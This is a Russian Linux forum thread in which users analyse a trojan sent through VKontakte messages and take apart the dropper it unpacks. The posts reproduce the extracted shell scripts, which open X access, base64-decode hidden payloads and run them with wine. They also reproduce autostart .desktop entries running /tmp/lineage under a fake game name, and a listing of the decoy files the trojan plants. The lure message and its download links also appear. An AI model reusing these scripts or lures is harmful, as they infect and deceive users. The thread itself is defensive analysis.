LINUX.ORG.RU
ФорумTalks

[vkontakt] троян?


0

0

Жене пришло сообщение в личку:

От кого: Alegzander Rasputin
Кому: ххххх хххххххх ххххххх
Тема:
...
Сообщение:
Это то что нам всем надо - иногда вспомнить, как все было. Раньше.
Remember the oldschools.
http://filegu.ru/f/xcaaCcC0/memory.html
или
http://depositfiles.com/files/qq45pj109
chmod u+x, просто запустить



Слил и посмотрел:
file memory
memory: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped


Сейчас на vbox по тестирую.

1 2

Натрави на него upx -d, потом strings, увидишь много интересного.

Cancellor ★★★★☆
()
Ответ на: комментарий от lexxus-lex

>>ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped

>Вирус наверное скриптовый?

wyldrodney
()
Ответ на: комментарий от lexxus-lex

#!/ova/fu
/hfe/ova/kubfg + 1>/qri/ahyy 2>/qri/ahyy
/hfe/ova/onfr64 -qv /gzc/.ucl > /gzc/fnqqq111
/hfe/ova/onfr64 -qv /gzc/fnqqq111 > /gzc/fnqbrf.rkr
ez -s /gzc/fnqqq111
puzbq 777 /gzc/fnqbrf.rkr
rkcbeg QVFCYNL=:0.0
pc /gzc/obgnxx /gzc/yvarntr
puzbq 0777 /gzc/yvarntr
/hfe/ova/jvar /gzc/fnqbrf.rkr
/hfe/ova/jvar /gzc/fnqbrf.rkr
#!/ova/fu
/hfe/ova/onfr64 -qv /gzc/.ucl > /gzc/.fgg1
/hfe/ova/onfr64 -qv /gzc/.fgg1 > /gzc/.fvfgl1
ez -s /gzc/.fgg1
/hfe/ova/onfr64 -qv /gzc/.mcl > /gzc/.fgg2
/hfe/ova/onfr64 -qv /gzc/.fgg2 > /gzc/.fvfgl2
ez -s /gzc/.fgg2

feanor ★★★
()
Ответ на: комментарий от feanor

#!/bin/sh
/usr/bin/xhost + 1>/dev/null 2>/dev/null
/usr/bin/base64 -di /tmp/.hpy > /tmp/saddd111
/usr/bin/base64 -di /tmp/saddd111 > /tmp/sadoes.exe
rm -f /tmp/saddd111
chmod 777 /tmp/sadoes.exe
export DISPLAY=:0.0
cp /tmp/botakk /tmp/lineage
chmod 0777 /tmp/lineage
/usr/bin/wine /tmp/sadoes.exe
/usr/bin/wine /tmp/sadoes.exe
#!/bin/sh
/usr/bin/base64 -di /tmp/.hpy > /tmp/.stt1
/usr/bin/base64 -di /tmp/.stt1 > /tmp/.sisty1
rm -f /tmp/.stt1
/usr/bin/base64 -di /tmp/.zpy > /tmp/.stt2
/usr/bin/base64 -di /tmp/.stt2 > /tmp/.sisty2
rm -f /tmp/.stt2

feanor ★★★
()
Ответ на: комментарий от feanor

Ибо

/VC.com
[Desktop Entry]
X-AppInstall-Package=synaptic
X-AppInstall-Popcon=80144
X-AppInstall-Section=main
Name=LineAge II for Linux
GenericName=LineAge II
Comment=LineAge II for Linux
Exec=gksu /tmp/lineage
Icon=synaptic
Terminal=false
Type=Application
Categories=Games;GTK;LineAge;
[Desktop Entry]
X-AppInstall-Package=synaptic
X-AppInstall-Popcon=80144
X-AppInstall-Section=main
Name=KSatus Launcher
GenericName=KSatus Launcher
Comment=KSatus Launcher
Exec=/tmp/lineage
Icon=synaptic
Terminal=false
Type=Application
Categories=System;Gnome;GTK;
X-GNOME-Autostart-enabled=true

feanor ★★★
()
Ответ на: комментарий от lexxus-lex

>>>У меня нет wine... дома... на ноутбуке..

>>Так поставь из портов. В чем проблема? :)

>:) А смысел?

Шоп было как у всех. :)

vada ★★★★★
()
Ответ на: комментарий от spacel0rd

>Судя по всему тестирование оказалось "удачным" =)

Из старого (где-то так)
-Пользователь ХХХ появился в форуме
-ХХХ: Пацаны! Нюк прикольный нашел! Дайте айпишник какогибудь ламера!
-ВВВ: Лови 127.0.0.1
-ХХХ: О! Спасибо! Ща!
-Пользователь ХХХ покинул форум

vada ★★★★★
()

Так всё таки, что оно делает то "злого"? =)

SilentLexx
() автор топика

А мне частенько приходят письма с фконтакта, типа, я запросил свой забытый пароль. :) Надо какнить по ковырять, чё они хотят чтоб я сделал :)

vada ★★★★★
()

> ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, stripped > #!/ova/fu

А как скрипт из бинарника вытащили? upx же вроде скрипты не пакует.

Lucky1 ★★★
()
Ответ на: комментарий от vada

> Значет не получилось. :( Неудачник? :)

Ну нету у меня сейчас под рукой "нормального" LiveCD, а на доисторическом DSL не работает (((

SilentLexx
() автор топика
Ответ на: комментарий от Lucky1

Распаковать upx'ом и посмотреть через strings.

feanor ★★★
()
Ответ на: комментарий от SilentLexx

Пишу сейчас из-под WebClient Lite, там есть вайн. Запустил, и вот что получилось: 

root@localhost:~/Downloads# ls -l                                                
total 0
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 charmap
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 cmd
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 DrWeb-for-Linux-glibc2.7.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 DrWeb-for-Linux-glibc2.8.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 DrWeb-for-Linux-glibc2.9.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 FIFA-2010.installer
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 intel-xorg-driverpack.install
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 Kaspersky_For-Linux-FS6_Beta2-x86.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 Kaspersky_For-Linux-FS_Trial-x64.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 Kaspersky_For-Linux-FS_Trial-x86.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 Lineage
-rwxr-xr-x    1 root     root        33684 Окт  8 09:38 memory
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 MP3-Reactor
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 msconfig
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 regedit
-rwxrwxrwx    1 root     root            0 Окт  8 09:40 SegaGame.exe
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 SexyGame
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 ShareDownloader
-rwxrwxrwx    1 root     root            0 Окт  8 09:40 VC.com
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 VMWare-install-x86_64.run
-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 VMWare-install-x86.run
Точно такое же безобразие во всех каталогах, которые находятся уровнем выше. И всё. Каких-то лишних процессов не видно.

Cancellor ★★★★☆
()
Ответ на: комментарий от SilentLexx 
root@localhost:~/Downloads# cmp -b memory Lineage 
root@localhost:~/Downloads# cmp -b memory ShareDownloader 
root@localhost:~/Downloads# cmp -b memory intel-xorg-driverpack.install 
root@localhost:~/Downloads#

Это всё один и тот же файл. Похоже, таки что-то не сработало.

Cancellor ★★★★☆
()
Ответ на: комментарий от Cancellor

<сарказм> На этом линупсе даже вирусы нормально не работают! </сарказм>

SilentLexx
() автор топика

>chmod u+x, просто запустить

noexec

matich
()
Ответ на: комментарий от Cancellor

>Это всё один и тот же файл. Похоже, таки что-то не сработало.

Как раз сработало. Так поступают зловреды, когда хотят распространяться через DC++ или его аналоги. Методом брутфорса "находит" расшаренный каталог :), а затем есть нехилая вероятность что какой-то лемминг, увидев вкусное название, его скачает и запустит.

А интересно, эти файлы - хардлинки?

Macil ★★★★★
()
Ответ на: комментарий от Macil 
root@localhost:~/Downloads# ls -i
    139 charmap                                    133 memory
    136 cmd                                        153 MP3-Reactor
    144 DrWeb-for-Linux-glibc2.7.run               138 msconfig
    145 DrWeb-for-Linux-glibc2.8.run               137 regedit
    146 DrWeb-for-Linux-glibc2.9.run               154 SegaGame.exe
    152 FIFA-2010.installer                        150 SexyGame
    140 intel-xorg-driverpack.install              151 ShareDownloader
    143 Kaspersky_For-Linux-FS6_Beta2-x86.run      155 VC.com
    142 Kaspersky_For-Linux-FS_Trial-x64.run       148 VMWare-install-x86_64.run
    141 Kaspersky_For-Linux-FS_Trial-x86.run       147 VMWare-install-x86.run
    149 Lineage

Нет.

Cancellor ★★★★☆
()
Ответ на: комментарий от Macil

Интересно, а много ли народу будет искать в DC++ такие вещи как msconfig и regedit? Тем более, учитывая что вирус-то линуксовый.

Cancellor ★★★★☆
()
Ответ на: комментарий от Macil 
>-rwxrwxrwx    1 root     root        33684 Окт  8 09:40 charmap
               ^ как бы намекает
xydo ★★
()

Вирусы для Линукса должны идти с хорошим man'ом, объясняющим как их запускать. :-)

smh ★★★
()
Ответ на: комментарий от Cancellor

>Интересно, а много ли народу будет искать в DC++ такие вещи как msconfig и regedit?

Дык, а это нужно для "замещения" этих программ троянаями: например ты жмешь Win+R, и выполняешь regedit. Если в каталоге твоего профиля будет regedit, то именно он и запустится. Под линухом это действительно не нужно.

Я такие вирусы видел лет 5 назад под виндой. Глупые, и ущербные как все вирусописатели. А уж самой концепции... она еще успешно под досом применялась.

Кроме того, а разве msconfig и regedit ELF'ы? У многих партиции с виндой примонтированы, так что такой подход может помочь заразить и винду.

Macil ★★★★★
()
Ответ на: комментарий от SilentLexx

>вот что увидел после запуска

Окак! Труп откопали!!!!!

vada ★★★★★
()
Ответ на: комментарий от Cancellor

>А на рабочем столе .desktop файлик под названием "Lineage II" появился?

кстати да, создало. Тот "салютик", это и есть sadoes.exe...

SilentLexx
() автор топика
Ответ на: комментарий от SilentLexx

Это какая-то гадость с эксплоитом повышающем права, вирусописатели даже не знают, что лялихоиды всегда обновляют ведро.

linux4ever
()
Ответ на: комментарий от Macil

> Дык, а это нужно для "замещения" этих программ троянаями: например ты жмешь Win+R, и выполняешь regedit. Если в каталоге твоего профиля будет regedit, то именно он и запустится

Оно конечно хорошо, но для этого надо как минимум скачать заражённый msconfig (etc...) из DC++, и положить его в каталог, который прописан в %PATH%. А учитывая, что в данном случае все эти msconfig'и есть не что иное как копия исходного файла 'memory', который 'ELF 32-bit LSB executable, blablabla', то это вообще теряет смысл...

Cancellor ★★★★☆
()

>Жене пришло сообщение в личку:

да ладно, чего стесняться-то?

anonchik
()
Ответ на: комментарий от Macil

> Глупые, и ущербные как все вирусописатели. А уж самой концепции...

Я вот вчера ковырял мобильного трояна... Эх, такую интересную концепцию развода оттуда вытащил, так гениально нае**вать жертву! Такое "ущербному" явно не под силу.

EmStudio
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.
1 2
Talks